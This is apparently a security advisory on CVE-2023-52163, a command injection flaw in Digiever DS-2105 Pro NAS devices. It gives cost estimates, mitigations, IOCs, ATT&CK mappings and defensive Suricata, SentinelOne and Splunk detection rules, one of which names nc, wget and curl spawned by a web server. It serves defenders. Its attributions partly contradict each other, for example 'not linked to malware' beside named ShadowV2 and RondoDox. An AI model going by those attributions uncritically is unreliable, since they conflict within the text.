BLUF

CISA added a missing authorization vulnerability in Digiever DS-2105 Pro network-attached storage (NAS) devices to its KEV catalog on December 22, 2025, due to evidence of active, in-the-wild exploitation. The flaw allows for command injection via the time_tzsetup.cgi script.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations affected by CVE-2023-52163 exploitation or suspected abuse:

• Low-end total cost: $400,000 – $600,000
  (Rapid isolation, limited device exposure, no secondary access detected)

• Typical expected range: $700,000 – $1.2M

  (Active exploitation confirmed, accelerated hardware replacement, compliance follow-up)

• Upper-bound realistic scenarios: $1.3M – $1.8M
  (Multiple internet-exposed devices, extended investigation, insurance friction, operational disruption)

Key cost driver:

This vulnerability is dangerous not because it causes immediate outages, but because it exposes unsupported, internet-reachable infrastructure that cannot be reliably remediated. Costs are driven less by recovery of the affected device and more by containment, validation, and governance response once leadership must attest to the security posture of end-of-life systems under active exploitation.

Potential Affected Sectors

Any organization using vulnerable Digiever DS-2105 Pro devices. The devices are NAS systems, potentially used in various sectors for storage and surveillance, including commercial, industrial, or potentially public sectors.

Potential Affected Countries

·         Global

Date of First Reported Activity:

·         Added" to the KEV list: December 22, 2025

Date of Last Reported Activity Update

·         December 23, 2025.

CVE-2023-52163

CVSS v3.1

·         (8.8) AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Nessus ID

·         There is not a Tenable ID for CVE-2023-52163

Is this on the KEV list

Yes

What is the CISA patch by date for CVE-2023-52163?

·         January 12, 2026

Patch release date

·         There is no official patch

Mitigation Data

Recommended Mitigation Suggestions

·         Isolate and Segment the Device: Immediately isolate the affected NVR from untrusted networks. Implement strict network segmentation to limit the potential for lateral movement if the device is compromised.

·         Restrict Access: Restrict access to the device's management interface to trusted administrators only. Do not expose the device to the public internet.

·         Disable or Block the Vulnerable Endpoint: If possible, disable or restrict access to the time_tzsetup.cgi web interface endpoint. Alternatively, use a web application firewall (WAF) or intrusion prevention system (IPS) to block HTTP requests targeting this specific endpoint.

·         Replace End-of-Life (EOL) Equipment: The most effective long-term solution is to replace the unsupported Digiever DS-2105 Pro with a currently maintained and patched alternative. Establish a hardware lifecycle management policy to ensure devices are replaced before they reach EOL.

·         Enforce Strong Authentication: Ensure strong, unique passwords are used for all administrative accounts on the device, as the vulnerability requires low-level authentication to exploit.

·         Monitor Network Traffic: Continuously monitor network traffic and device logs for any unusual command execution patterns or unauthorized access attempts. Deploy IPS signatures to detect exploitation attempts.

APT Names

Not directly tied t o a specific APT group CVE-2023-52163 has been used in campaigns associated to

·         Salt Typhoon

·         Operator Panda

·         Red Mike

·         UNC5807

·         Ghost Emperor

Associated Criminal Organization Names

While CVE-2023-52163 has been used in ransomware campaigns it has not been tied to specific organizations.

IOCs

As a reminder most campaigns use dynamic indicators.
These indicators might found in  historical data however heuristic data would be better indicators.

Domains

·         silverpath.shadowstresser.info (C2 server domain)

·         shadow.aurozacloud.xyz (C2 server domain)

IP Addresses

·         81.88.18.108 (C2 server IP address)

·         198.199.72.27 (Malware distribution server IP address)

File Hashes (SHA-256)

7dfbf8cea45380cf936ffdac18c15ad91996d61add606684b0c30625c471ce6a

(ShadowV2 binary)

Network Artifacts

·         Downloader Script Name: binary.sh

Malware Identification String

·         "ShadowV2 Build v1.0.0 IoT version"

Vulnerable File Path

·         time_tzsetup.cgi

Vulnerable Product

·         Digiever DS-2105 Pro (End-of-Life/Unsupported)

Tools Used in Campaign

RondoDox Botnet

This is the main threat actor associated with exploiting CVE-2023-52163. The botnet targets a wide range of internet-exposed devices, including routers, DVRs, NVRs, CCTV systems, and web servers.

Exploit Shotgun" Strategy

The RondoDox campaign does not rely on a single tool but rather uses a method where multiple exploits for various vulnerabilities (over 50) are deployed simultaneously to maximize infection rates.

Automated Exploitation

The nature of the RondoDox botnet campaign indicates the use of automated scripts or tools that scan for and attempt to exploit the command injection vulnerability in vulnerable Digiever devices without specific, human-controlled targeting.

TTPs

·         T1059.004  Command and Scripting Interpreter: Unix Shell

o   This vulnerability allows for the injection of arbitrary system commands through the time_tzsetup.cgi web interface endpoint, which are then executed by a Unix shell on the underlying system.

·         T1210  Exploitation of Remote Services

o   The vulnerability can be exploited by an attacker over the network (remotely) without requiring any user interaction.

·         T1574  Hijack Execution Flow

o   This technique is a general reference to methods attackers use to redirect the flow of execution, which is applicable as the command injection alters the intended program flow to run malicious commands.

·         TA0001  Initial Access

o   The exploitation of this network-accessible vulnerability provides the initial foothold on the device.

·         TA0002  Execution

o   The primary impact is the ability to execute arbitrary commands on the affected system with high privileges

Malware Names

·         Not directly linked to Malware

Suggested rules / potential hunts

Please keep in mind that these are indicator rules, they are likely to be noisy..

For best results

Potential Suricata Rule

Network Detection)

This rule monitors for HTTP POST requests to the vulnerable CGI script containing common command injection characters in the payload.

bash

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Digiever DS-2105 Pro Command Injection Attempt (CVE-2023-52163)"; flow:established,to_server; content:"POST"; http_method; content:"/time_tzsetup.cgi"; http_uri; pcre:"/(?:;|\||`|\$\()|(?:\%3b|\%7c|\%60|\%24\%28)/Pi"; classtype:attempted-admin; sid:202352163; rev:1;)

Actionable Step: Implement this via your Suricata configuration or a reverse proxy like Nginx if traffic is encrypted.

Potential SentinelOne Rules

SentinelOne (Endpoint Hunting)

·         While primarily a network-side vulnerability, successful exploitation often leads to a shell process spawned by the web server user (typically root or www-data).

s1ql

ProcessName In ("sh", "bash", "nc", "wget", "curl") AND ParentProcessName Contains "httpd" AND ParentProcessName Contains "cgi"

·         Deep Visibility: Use this query in the SentinelOne Deep Visibility pane to hunt for post-exploitation lateral movement or command execution initiated by the web service

Potential Splunk Hunts

Search for abnormal web server activity targeting the specific URI with non-standard status codes or high-risk characters.

splunk

index=web sourcetype=access_* uri_path="*/time_tzsetup.cgi*"

| where match(urldecode(payload), "[;\|`\$]")

| stats count by src_ip, uri_path, status, user_agent

| sort - count

Use code with caution.

Delivery Method

·         Network exploitation of the vulnerable web interface.

Email Samples

·         Not applicable

References

CISA

hxxps://www.cisa.gov/news-events/alerts/2025/12/22/cisa-adds-one-known-exploited-vulnerability-catalog

hxxps://www.cisa.gov/known-exploited-vulnerabilities-catalog

NVD

hxxps://nvd.nist.gov/vuln/detail/CVE-2023-52163

Akami

hxxps://www.akamai.com/blog/security-research/digiever-fix-that-iot-thing

TXOne

hxxps://www.txone.com/blog/digiever-fixes-sorely-needed/

FortiGuard

hxxps://www.fortinet.com/lat/blog/threat-research/shadowv2-casts-a-shadow-over-iot-devices

Checkpoint

hxxps://advisories.checkpoint.com/defense/advisories/public/2025/cpai-2023-2059.html

RedHat

hxxps://access.redhat.com/security/cve/cve-2023-52163